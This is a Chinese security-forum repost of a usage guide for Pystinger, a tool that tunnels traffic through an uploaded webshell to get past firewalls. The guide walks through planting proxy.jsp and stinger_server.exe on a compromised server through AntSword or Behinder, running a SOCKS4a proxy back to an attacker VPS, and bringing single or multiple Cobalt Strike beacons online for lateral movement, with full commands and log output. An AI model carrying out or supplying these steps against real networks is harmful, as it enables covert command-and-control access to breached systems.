设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 Pystinger - 使用Webshell绕过防火墙进行流量转发 ...
返回列表 发新帖
查看: 2353|回复: 0

Pystinger - 使用Webshell绕过防火墙进行流量转发

[复制链接]
gclome

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-5-10 21:53:31 | 显示全部楼层 |阅读模式
原文链接:Pystinger - 使用Webshell绕过防火墙进行流量转发

pystinger通过webshell实现内网SOCK4代理,端口映射,可直接用于metasploit-framework,viper,cobalt strike上线。


        主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。

     假设不出网服务器域名为 http://example.com:8080 ,服务器内网IP地址为192.168.3.11

1 . SOCK4代理
  • proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8
  • 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连
  • vps执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • 如下输出表示成功
    1. root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
    2. 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
    3. 2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
    4. 2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
    5. 2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
    6. 2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
    7. 2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
    8. 2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
    9. 2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
    10. 2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
    11. 2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
    12. 2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
    13. 2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
    14. 2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
    15. 2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
    16. 2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
    17. 2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
    18. 2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
    19. 2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
    20. 2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
    21. 2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
    22. 2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
    23. 2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
    24. 2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
    复制代码

  • 此时已经在vps127.0.0.1:60000启动了一个example.com所在内网的socks4a代理

  • 此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020

2 . cobalt strike单主机上线
  • proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8
  • 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连
  • stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • 如下输出表示成功
    1. root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
    2. 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
    3. 2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
    4. 2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
    5. 2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
    6. 2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
    7. 2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
    8. 2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
    9. 2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
    10. 2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
    11. 2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
    12. 2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
    13. 2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
    14. 2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
    15. 2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
    16. 2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
    17. 2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
    18. 2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
    19. 2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
    20. 2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
    21. 2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
    22. 2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
    23. 2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
    24. 2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
    复制代码

  • cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1

  • 生成payload,上传到主机运行后即可上线

3 . cobalt strike多主机上线
  • proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回 UTF-8
  • 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe 192.168.3.11启动服务端

192.168.3.11可以改成0.0.0.0
  • stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
  • 如下输出表示成功
    1. root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
    2. 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
    3. 2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
    4. 2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
    5. 2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
    6. 2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
    7. 2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
    8. 2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
    9. 2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
    10. 2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
    11. 2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
    12. 2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
    13. 2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
    14. 2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
    15. 2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
    16. 2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
    17. 2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
    18. 2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
    19. 2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
    20. 2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
    21. 2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
    22. 2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
    23. 2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
    24. 2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
    复制代码

  • cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为192.168.3.11(example.com的内网IP地址)
  • 生成payload,上传到主机运行后即可上线
  • 横向移动到其他主机时可以将payload指向192.168.3.11:60020即可实现出网上线

4 . 定制Header及proxy
  • 如果webshell需要配置Cookie或者Authorization,可通过--header参数配置请求头

--header "Authorization: XXXXXX,Cookie: XXXXX"
  • 如果webshell需要通过代理访问,可通过--proxy设置代理

--proxy "socks5:127.0.0.1:1081"
stinger_server\stinger_client
  • windows
  • linux

proxy.jsp(x)/php/aspx
  • php7.2
  • tomcat7.0
  • iis8.0


项目地址:
https://github.com/FunnyWolf/pystinger/releases/tag/v1.6


回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-21 05:43 , Processed in 0.018039 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表